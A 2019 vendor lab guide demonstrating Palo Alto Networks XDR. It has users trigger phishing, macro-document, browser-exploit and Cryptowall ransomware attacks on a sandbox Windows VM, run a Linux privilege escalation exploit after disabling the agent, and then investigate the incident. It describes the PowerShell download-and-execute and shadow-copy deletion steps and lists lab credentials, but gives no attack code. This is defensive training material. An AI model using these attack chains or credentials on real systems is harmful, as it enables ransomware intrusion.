XDR Demo Lab Guide

Dan Blankenship – 2019

1
Table of Contents

Accessing the Lab Environment: 3

Demo Outline: 7

Part 1: Compromising the Vic m Host

Phishing A ack: 8
Malicious Word Document: 12
Malicious link on a website: 15
Direct Execu on of Malware: 17

Part 2: A emp ng to compromise a host protected by XDR, and preven ng the a ack
Phishing a ack on protected VM: 20
Malicious Word document on protected VM: 21
Malicious link in a website on protected VM: 22
Direct Execu on of malware (.exe) on protected VM: 23
Script-based A ack (Behavioral Threat Preven on): 24
Linux Privilege Escala on Exploit: 26

Part 3: Viewing the preven on events and related informa on in the XDR Console
View preven on events 33
Repor ng 37

Part 4 – Viewing anIncident in XDR and determining causality

Genera ng Data: 40
Access the XDR console: 42
Naviga ng the XDR console 42
Analyzing the event: 44

Part 5 – Threat Hun ng in XDR

Threat hun ng with Queries: 48

2
Accessing the Lab environment:
Go to h p://tms.panwlabs.net and follow the on-screen prompts:

The Passphrase is: GoPaloAltoNetworks

If you experience any issues logging in to the lab, or for general support
ques ons, please contact:
panwlabs-help@paloaltonetworks

A er entering this and your contact informa on you will receive a series of emails:

One confirming your request:

3
And a second once the environment has booted, which contains the URL and creden als to access the
lab:

4
Once logged in to Palo Alto Networks Lab you will arrive at a landing page showing you the virtual
machines in the environment you can interact with:

5
The VM’s available are:

Hostname Descrip on Username Password

Vic m Windows 7 host without XDR agent installed Administrator Password1!
Protected Windows 7 host with XDR agent installed and enabled Administrator Password1!
Ubuntu Linux host with a XDR agent installed and enabled vic m Password1!
Kali Kali Linux box, used as the “a acker” host root toor

Management UI addresses:
***XDR Console should be viewed in an incognito/private browser window on your worksta on***

Applica on URL Username Password

XDR h p://xdrdemolab.com/xdr demouser@xdrdemolab.com Password1!

You can right-click and select “open link in new tab” to access mul ple VM’s simultaneously. Open VM’s
will be displayed in the “Recent Connec ons” panel:

These VM’s XDR agents are managed by the XDR console. The tenant used for this lab can be accessed
at:

6
h p://xdrdemolab.com/xdr with the login creden als:

Username: demouser@xdrdemolab.com

Password: Password1!

The prepared demonstra on consists of 5 parts:

1. Compromising an unprotected host
2. A emp ng to compromise a host protected by XDR, and preven ng the a ack
3. Viewing the preven on events and related informa on in the XDR console
4. Researching the events & incidents in XDR
5. Threat hun ng in XDR

All of these VM’s will be used in the demonstra on, but we will start by clicking the “Vic m” machine’s
tab to begin.

Part 1 - Compromising an unprotected host

You will be presented with a Windows login screen

Log in as administrator using the password “Password1!”.

7
Once logged in you will see several files and shortcuts on the desktop:

These will allow you to demonstrate different ways to compromise this virtual machine. The methods
available are:

Phishing emails
Malicious Word document
Malicious link in a website
Direct Execu on of malware (.exe)

In this demonstra on, all of these a acks, if successful, will have the same result: execu on of
ransomware on the vic m. This means that you can only demonstrate one of these a ack methods
before the vic m machine is compromised because the result is drive encryp on

Below are instruc ons to demonstrate each a ack:

Phishing a ack:

8
Open Microso Outlook with the shortcut on the desktop .

The inbox will contain 2 phishing emails. One disguising itself as an ad for cellular discounts, and
the other masquerading as a google account security alert.

9
Clicking any of the links in either of these emails will take you to the respec ve bogus website,
hosted by our a acker. The sites will load a browser exploit and if successful it will deliver and
execute a ransomware payload.

10
It is always possible that the exploit will not succeed, and nothing will happen. If this occurs,
simply close the browser window, open email again, and click the malicious link again.

11
 If successful, a er a few moments the ransomware will encrypt images, documents, and other
personal files on the machine, and present a pop-up demanding payment to decrypt them.

Malicious Word document:

Open the invoice.docm file on the desktop

The document is designed to appear encrypted. It is designed to trick the user into clicking
“Enable Content” to ‘decrypt’ the document. In reality, this bit of social engineering is designed
to trick the user into running the malicious VBA macro in the document, which will use
powershell to download and execute the ransomware payload

12
Click the “Enable Content” bu on in the top of the window

13
A er enabling the content, the macro will auto-run. The document will appear to “decrypt” and
the ransomware payload will be run in the background

14
 If successful, a er a few moments the ransomware will encrypt images, documents, and other
personal files on the machine, and present a pop-up demanding payment to decrypt them.

Malicious link in a website:

Open the “Exploit Tests” shortcut on the desktop

A erwards a webpage will open with 3 bu ons:

“Exploit and print system message”: This will exploit the browser and execute a benign
payload. This is used primarily for tes ng and is not part of the demo.
“Exploit and deliver crypto malware”: This will exploit the browser and execute a
version of Cryptowall, encryp ng por ons of the VM’s drive and displaying a ransom
message.

15
 “Download malware directly”: This will allow you to download the Cryptowall
executable directly without exploi ng the browser. This will be addressed in the next
sec on.

For this demonstra on, click “Exploit and deliver crypto malware”. This simulates clicking a
malicious link in a trusted website.

If successful, the browser window will disappear and you will see the ransom message pop up
shortly a erwards.

16
 It is always possible that the exploit will not succeed, and nothing will happen. If this occurs,
simply close the browser window, open the shortcut again, and click “Exploit and deliver crypto
malware” again.

Direct Execu on of malware (.exe):

Open the “Exploit Tests” shortcut on the desktop

A erwards a webpage will open with 3 bu ons:

“Exploit and print system message”: This will exploit the browser and execute a benign
payload. This is used primarily for tes ng and is not part of the demo.

17
 “Exploit and deliver crypto malware”: This will exploit the browser and execute a
version of Cryptowall, encryp ng por ons of the VM’s drive and displaying a ransom
message.
“Download malware directly”: This will allow you to download the Cryptowall
executable directly without exploi ng the browser.

For this demonstra on, click “Download crypto malware directly”. This a ack involves no
exploit whatsoever, because the user is directly execu ng the malware. Save the file to the
Desktop and double click it.

18
If successful, a er a few moments the ransomware will encrypt images, documents, and other personal
files on the machine, and present a pop-up demanding payment to decrypt them.

19
Now that you have shown any number of ways a host can be compromised, you should proceed to:

Part 2 - A emp ng to compromise a host protected by XDR, and preven ng the

a ack

Open the “Protected” machine from the connec ons page. You will be presented with a Windows login
screen:

20
Log in as administrator using the password “Password1!”.

All of the same a ack methods are available on the protected machine, but an XDR agent is also
installed. Here you can demonstrate XDR’s ability to stop all of these by repea ng the instruc ons
above.

Phishing a ack on protected VM:

When you click the link in the phishing email and are taken to the bogus website, XDR will
prevent the so ware exploit a empt and deliver a pop-up message aler ng the user. Clicking ok
will result in the termina on of the Internet Explorer process.

21
Malicious Word document on protected VM:
When you double click the “invoice.docm” file on the desktop, XDR will iden fy the malicious
macro in the file and prevent Microso Word from loading it.

22
Malicious link in a website on protected VM:
When you open the “Exploit Tests” shortcut on the desktop, and click “Exploit and
deliver crypto malware”, XDR will prevent the so ware exploit a empt and deliver a
pop-up message aler ng the user. Clicking ok will result in the termina on of the
Internet Explorer process.

23
Direct Execu on of malware (.exe) on protected VM:
When you open the “Exploit Tests” shortcut on the desktop, and click “Download crypto
malware directly”, XDR’s Local Algorithmic Analysis will iden fy the malicious executable,
deliver a pop-up message aler ng the user. Clicking ok will result in the removal of the malicious
executable.

24
Script-based A ack (Behavioral Threat Preven on):
A acks using non-malicious so ware (i.e. Powershell, wscript, etc), or “living-off-the-land a acks
are difficult to iden fy due to the benign nature of the tools the a acker uses. XDR’s Behavioral
Threat Preven on (BTP) monitors users’ ac ons in an effort to iden fy a chain of events that
indicate malicious intent from these benign tools.

25
Double-clicking “BTP_demo.vbs” on the desktop will ini ate a series of events meant to simulate
a script-based a ack. XDR will prevent the scripted ac ons from comple ng.

26
 You can view the details of this alert in the XDR console later.

Linux Privilege Escala on Exploit:

27
Login as the user “vic m” on the Ubuntu VM. Please note that a XDR agent is installed on this host and
enabled

Once logged in, open a terminal window

28
At the command prompt, type “./exploit”

This will a empt to execute a privilege escala on exploit that will get you root access without a
password, however XDR will terminate the process (Note: This may close your terminal window as well).

29
You will not see a pop-up alert, but you can view the event in the XDR Management Service. The event
type will be “Kernel Privilege Escala on”

Back in the Linux VM, open a new terminal window and type “./disable_XDR.sh” into the command
prompt and enter the password “Password1!”

30
You will see that the XDR processes have been stopped.

Next, type “./exploit” into the command prompt to a empt the exploit again, with XDR disabled.

31
This me it should succeed, because XDR is now disabled, and you will have access to a shell as root.
You can enter the command “whomai” to verify.

A er you have prevented any or all of these a acks, you can move on to:

Part 3 - Viewing the preven on events and related informa on in the XDR
Console
If you are not already logged in to XDR, open a web browser and go to h p://xdrdemolab.com/xdr and
login with the creden als:

Username: demouser@xdrdemolab.com

Password: Password1!
The XDR console is read-only, so you will be able to view security events and other
configura ons/logs, but cannot make changes.

32
When you login you will be taken to the default dashboard. The dashboard is an excellent place to view
the overall health of an enterprise, but first let's view the raw alerts you just created:

33
XDR combines individual, related alerts into Incidents. To view the raw preven on events we just saw
on the protected VM’s you need to click on Inves ga on → Incidents tab, and then click the “Alerts
Table” in the top right:

In the alerts table, you should see several recent exploit preven ons and Wildfire/malware preven ons:

The number of events you see in your XDR console will vary depending on the number of a ack
preven ons you demonstrated in the previous step.

The Alerts table provides an overview of each event. Right-clicking on one of these events and selec ng
“Analyze” will provide more contextual informa on.

34
Memory Corrup on Exploits will provide informa on about the username and hostname involved in the
event, the process involved, other files loaded at the me, and other sundry informa on:

Wildfire/Local analysis Malware preven ons involve office documents or executables and in addi on to
the above informa on, also provide a detailed Wildfire dynamic analysis report about the malicious
executable or document. This can be accessed from within the analysis card by clicking the download
icon under “Wildfire Score”:

Repor ng:
XDR can create scheduled and on-demand reports about security events, agent status, license usage,
and other data. To view them, click on the Repor ng -> Reports in the XDR console

35
A report has already been run in XDR, you can view it by right-licking the row and selec ng “ download:

This par cular report summarizes the status of the XDR agents

36
Part 4 – Viewing an Incident in XDR and determining Causality
XDR analyzes raw security alerts and combines them into larger incidents. This allows a user to quickly
understand how individual security events are related and reduces alert fa gue by linking seemingly
disparate events into one group.

Genera ng Data:

37
To generate interes ng data to view in XDR, certain excep ons have been made to the XDR agent’s policy
to allow a ransomware a ack to play out almost to frui on. Typically, a properly configured XDR agent
would prevent this type of a ack, as was demonstrated earlier, but for the sake of this por on of the
demonstra on we are using this par ally disabled policy.

On the Protected host, open the folder on the desktop named “XDR_demo” and then open the
“your_invoice.docm” file inside the folder.

Incidentally, this is the same document used in the malicious word document example earlier in this
guide.

Because of the loca on of this file, the XDR agent will allow this a ack to play out.

The document is designed to appear encrypted. It is designed to trick the user into clicking “Enable
Content” to ‘decrypt’ the document. In reality, this bit of social engineering is designed to trick the user
into running the malicious VBA macro in the document, which will use powershell to download and
execute the ransomware payload

38
Click the “Enable Content” bu on in the top of the window

39
A er enabling the content, the macro will auto-run. The document will appear to “decrypt” and the
ransomware payload will be run in the background.

Again, because the policy pertaining to this document has several modules disabled, the ransomware
will be allowed to execute. XDR will eventually prevent the encryp on using a behavioral ransomware
preven on module, and you will see a popup message.

You may click okay to close the alert window.

Accessing the XDR console:

Next we need to login to XDR. If you have not already done so, open a new incognito/private web
browser on your desktop and go to h p://xdrdemolab.com/xdr and login with the creden als:

Username: demouser@xdrdemolab.com

Password: Password1!

Naviga ng the XDR console:

The XDR instance is read-only, so you will be able to view and filter alerts, incidents and other
configura ons/logs, but cannot make changes.

40
Once logged in you will see the Incidents dashboard. Clicking on open incidents widget will take you to
the incidents summary page

From here, right click the incident you want to inves gate and select “View Incident”. In this
demonstra on, we triggered a ransomware payload, so find the incident related to “Process requests the
dele on of windows shadowcopies” and select “Analyze”.

41
Once viewing the incident XDR I&R will collect the assets, files, IP addresses, and alerts involved in the
incident and summarize what happened.

42
Processes iden fied as malicious by wildfire will be highlighted in red, and wildfire reports about the files
can be downloaded by clicking a bu on to the right of the file.

Analyzing the event:

To view a flowchart of what exactly happened in the incident, right click one of the alerts and select
“Analyze”

XDR I&R will build a flowchart showing each step of the a ack and surface cri cal informa on in the
lower por on of the screen. XDR also iden fies the “Causality Group Owner”, with the CGO tag (in this
example, winword.exe). This is what XDR believes to be the root cause of the incident.

43
If you click through the nodes of the flowchart, beginning with winword.exe, you can view the
commands that were run and be er understand exactly how the a ack was executed.

First, we can see that winword.exe ran a command to open “invoice.docm”

Clicking on the second node, powershell.exe, we can see that PowerShell was used to download
something called “payload.txt” from the ip address 10.0.0.10.

44
Click on the third node we can see that a second instance of PowerShell was passed a base64 encoded
string to execute. This type of dropper behavior is very common in malware a acks in an a empt to
bypass the endpoint’s security.

Above several nodes in the causality chain you can see red badges. These denote that an alert (or alerts)
was triggered at this stage of the a ack. Badges with the XDR agent logo indicate endpoint alerts

Triangular badges indicate XDR BIOC alerts

45
Walking through the remaining nodes will provide more informa on about the a ack.

Several executables have been highlighted in red. Similar to the incident page, these indicate that
Wildfire iden fied these as malicious files. This informa on, along with the fact that they are unsigned is
also presented in the lower por on of the screen.

The last node in the chain is vssadmin.exe. A process signed by Microso that wildfire iden fied as
benign. However, if we look at the command run, we can see vssadmin.exe was being used to delete
Windows’ shadow copies. These are backups of the filesystem. Ransomware o en does this to prevent
a compromised machine from being rolled back to a safe state.

Despite this being a benign process with a valid signature, XDR has s ll iden fied this ac vity as highly
suspect, which triggered an alert:

46
Since XDR eventually prevented the ransomware from encryp ng the drive, no immediate ac on in
necessary at this me.

Part 5 – Threat Hun ng in XDR Inves ga on & Response

We can also use XDR I&R to hunt for other instances of an ar fact from an a ack.

If we look back at the causality card from our inves ga on, we can see the IP address the ini al payload
was downloaded from in the first PowerShell node.

Select the Query Builder from the Inves ga on Menu.

47
XDR I&R uses an easy to GUI to build queries instead of a complex query language. You can search for
different types of ar fact. In this case we will use a network query because we are searching for an IP
address.

48
A er selec ng Network. Type the IP address 10.0.0.10 in to the “Remote IP” field

The query builder lets us search on more than one piece of data. Since we know that powershell.exe
was used to download the payload, we need to add it into the search to narrow the results. Click the “+
PROCESS” bu on and a new set of search fields will be presented.

49
In the Process Name field, type “powershell.exe”, then click the RUN bu on in the lower righthand
corner

XDR I&R will search through all of the data stored in the Data Lake, iden fying historic instances of the
behavior you are searching for.

From the results page we can right click and select “Analyze” to get more context.

50
XDR I&R will create a new causality card similar to when we were inves ga ng an incident, but this me
will plot the data we were searching for so we can be er understand what led to the connec on to this
IP address.

51
52